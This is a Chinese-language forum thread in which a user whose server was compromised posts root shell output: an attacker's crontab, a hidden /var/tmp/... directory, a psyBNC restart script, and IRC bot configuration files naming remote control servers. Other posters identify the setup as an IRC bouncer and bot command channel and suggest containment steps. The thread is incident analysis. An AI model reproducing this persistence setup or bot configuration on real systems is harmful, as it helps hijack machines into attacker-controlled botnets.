我的机子被人黑了.大家看看他想要做什么?

lylzgq

[root@xxx scripts]# crontab -l\r\n# DO NOT EDIT THIS FILE - edit the master and reinstall.\r\n# (/tmp/crontab.8367 installed on Thu Aug 24 15:47:45 2006)\r\n# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)\r\n*/10 * * * * killall -9 smbd >/dev/null 2>&1\r\n*/10 * * * * /var/tmp/.../tmp/psybncchk >/dev/null 2>&1\r\n*/10 * * * * cd /var/tmp/.../knb; ./knb tw >/dev/null 2>&1\r\n-------------------------------------------------------------------------------\r\n[root@xxx tmp]# cd /var/tmp/.../tmp/\r\n[root@xxx tmp]# dir\r\nCHANGES          bash             makesalt         psybncchk\r\nCOPYING          config.h         menuconf         salt.h\r\nFAQ              help             motd             scripts\r\nMakefile         key              psybnc.conf      src\r\nREADME           lang             psybnc.conf.old  targets.mak\r\nSCRIPTING        log              psybnc.md5sum    tools\r\nTODO             makefile.out     psybnc.pid\r\n[root@xxx tmp]# cd /var/tmp/.../knb\r\n[root@xxx tmp]#dir \r\nCHANGELOG        conf             knb_bro.uf       tw\r\nREADME           knb              pid.knb_bro\r\ncfg-examples     knb-0.2.1-linux  scripts\r\n\r\n-------------------------------------------------------------------------------\r\n[root@xxx knb]# cat  /var/tmp/.../tmp/psybncchk#!/bin/sh\r\n# This is the crontab script for psybnc.\r\n#\r\n# Please change the following path to your psybnc-directory.\r\n\r\nPSYBNCPATH=/var/tmp/.../tmp\r\n\r\n# the rest should be kept as is\r\n\r\nif test -r $PSYBNCPATH/psybnc.pid; then\r\n    PSYPID=$(cat $PSYBNCPATH/psybnc.pid)\r\n    if $(kill -CHLD $PSYPID >/dev/null 2>&1)\r\n    then\r\n        exit 0\r\n    fi\r\nfi\r\ncd $PSYBNCPATH\r\n./bash &>/dev/null\r\n--------------------------------------------------------------------------\r\n\r\n[root@xxx knb]# cat  /var/tmp/.../knb/tw\r\nnick knb_bro\r\nrealname Bro.\r\n;logfile Knb.log\r\nnicks a b c d e f g h i j k l m n o p q r s t u w v x y z\r\nchannel #gtw\r\nident open\r\nserver 139.175.239.20 6667\r\nserver 203.204.205.222 6667\r\n------------------------------------------------\r\n[root@xxx knb]# cat /var/tmp/.../knb/conf\r\nnick Knb\r\nrealname Need Knb? Go to http://hoth.amu.edu.pl/~esio/c \r\n;logfile Knb.log\r\nnicks a b c d e f g h i j k l m n o p q r s t u w v x y z\r\nchannel #Knb\r\nserver lublin.irc.pl 7776\r\nserver warszawa.irc.pl 6667\r\nserver poznan.irc.pl 6667\r\n\r\n大家还想看什么文件,我再贴......帮我看下他在实现一个什么功能?

testab

实现一个irc服务器. \r\n  某些蠕虫连接到irc服务器,接受攻击其他服务器的指令,发垃圾邮件等等...

lylzgq

也就是用我的机子为跳板。向其他机子发垃圾信息？

testab

原帖由 lylzgq 于 2006-8-24 22:55 发表\r\n也就是用我的机子为跳板。向其他机子发垃圾信息？

\r\n\r\n否. \r\n受害机器连接到你的机器 接收控制指令

PCOS

建议本站加个免费杀毒区！我的机器这几天都有中毒木马这个现象！希望路过的大侠帮我搞下!

testab

原帖由 PCOS 于 2006-8-28 00:51 发表\r\n建议本站加个免费杀毒区！我的机器这几天都有中毒木马这个现象！希望路过的大侠帮我搞下!

\r\n\r\n杀一般的病毒纯是体力活，很高级的病毒需要真功夫。

与雨相随

他想建一个psybnc，从表面上就这样......然后想搞个BOT.........

langue

先断开sshd；从iptables上关掉端口，再慢慢解决问题。